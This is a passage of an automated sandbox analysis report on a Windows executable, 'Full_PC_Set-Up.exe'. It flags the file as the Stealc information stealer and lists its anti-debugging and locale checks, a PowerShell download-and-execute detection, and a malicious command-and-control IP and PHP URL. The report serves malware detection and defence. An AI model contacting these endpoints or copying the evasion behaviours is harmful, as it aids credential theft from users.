Source: C:\Users\user\Desktop\Full_PC_Set-Up.exe Code function: 0_2_002961A0 CoInitialize,GetCommandLineW,CommandLineToArgvW,LocalFree,CreateMutexW,SetUnhandledExceptionFilter,InitCommonControlsEx,__wsetlocale,GdiplusStartup,DefWindowProcW,LoadIconW,LoadCursorW,GetStockObject,RegisterClassW,MessageBoxW,GetLastError, 0_2_002961A0
Source: C:\Users\user\Desktop\Full_PC_Set-Up.exe Code function: 0_2_003812A6 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 0_2_003812A6
Source: C:\Users\user\Desktop\Full_PC_Set-Up.exe Code function: 0_2_00381608 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 0_2_00381608
Source: C:\Users\user\Desktop\Full_PC_Set-Up.exe Code function: 0_2_0038B6F3 __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_0038B6F3
Source: C:\Users\user\Desktop\Full_PC_Set-Up.exe Code function: 0_2_00299E20 CoInitialize,GetCommandLineW,CommandLineToArgvW,LocalFree,CreateMutexW,SetUnhandledExceptionFilter,InitCommonControlsEx,__wsetlocale,GdiplusStartup,DefWindowProcW,LoadIconW,LoadCursorW,GetStockObject,RegisterClassW,MessageBoxW,GetLastError, 0_2_00299E20
Source: C:\Users\user\Desktop\Full_PC_Set-Up.exe Memory protected: page guard Jump to behavior

HIPS / PFW / Operating System Protection Evasion
barindex
Yara detected Powershell download and execute
Source: Yara match File source: Process Memory Space: Full_PC_Set-Up.exe PID: 7444, type: MEMORYSTR
Source: C:\Users\user\Desktop\Full_PC_Set-Up.exe Code function: 0_2_002C1CA0 AllocateAndInitializeSid,GetCurrentThread,OpenThreadToken,GetCurrentProcess,OpenProcessToken,FreeSid,GetTokenInformation,GetTokenInformation,_calloc,FreeSid,CloseHandle,GetTokenInformation,EqualSid,FreeSid,CloseHandle, 0_2_002C1CA0
Contains functionality to query locales information (e.g. system language)
Source: C:\Users\user\Desktop\Full_PC_Set-Up.exe Code function: GetLocaleInfoA, 0_2_0039D105
Queries the volume information (name, serial number etc) of a device
Source: C:\Users\user\Desktop\Full_PC_Set-Up.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Full_PC_Set-Up.exe Code function: 0_2_002DA760 GetFileType,SetFilePointer,GetLocalTime,SystemTimeToFileTime,FileTimeToDosDateTime, 0_2_002DA760
Source: C:\Users\user\Desktop\Full_PC_Set-Up.exe Code function: 0_2_0038F75F __get_daylight,__invoke_watson,__get_daylight,__invoke_watson,__get_daylight,__invoke_watson,____lc_codepage_func,__getenv_helper_nolock,_strlen,__malloc_crt,_strlen,_strcpy_s,__invoke_watson,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,__invoke_watson,__invoke_watson, 0_2_0038F75F
Source: C:\Users\user\Desktop\Full_PC_Set-Up.exe Code function: 0_2_003D2A00 _memset,GetVersionExW, 0_2_003D2A00

Stealing of Sensitive Information
barindex
Yara detected Stealc
Source: Yara match File source: 00000000.00000002.1877669838.0000000000FD3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1878986975.0000000002C60000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: Full_PC_Set-Up.exe PID: 7444, type: MEMORYSTR
Source: Yara match File source: dump.pcap, type: PCAP

Remote Access Functionality
barindex
Yara detected Stealc
Source: Yara match File source: 00000000.00000002.1877669838.0000000000FD3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1878986975.0000000002C60000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: Full_PC_Set-Up.exe PID: 7444, type: MEMORYSTR
Source: Yara match File source: dump.pcap, type: PCAP
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 1525664 Sample: Full_PC_Set-Up.exe Startdate: 04/10/2024 Architecture: WINDOWS Score: 76 11 Suricata IDS alerts for network traffic 2->11 13 Yara detected Stealc 2->13 15 Yara detected Powershell download and execute 2->15 5 Full_PC_Set-Up.exe 13 2->5         started        process3 dnsIp4 9 45.200.148.115, 49735, 80 Africa-on-Cloud-ASZA Seychelles 5->9 17 Contains functionality to behave differently if execute on a Russian/Kazak computer 5->17 signatures5
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
45.200.148.115
 unknown Seychelles
328608 Africa-on-Cloud-ASZA true

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://45.200.148.115/0a616124ff2f2b69.php true
    		unknown
    http://45.200.148.115/ true
      		unknown